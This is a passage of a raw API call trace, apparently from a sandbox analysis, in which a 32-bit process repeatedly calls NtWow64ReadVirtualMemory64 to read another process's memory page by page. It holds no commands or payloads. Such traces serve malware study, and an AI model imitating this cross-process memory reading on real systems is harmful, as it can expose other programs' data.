ProcessHandle=0x1e4, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x27b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x27ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x27bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.659] 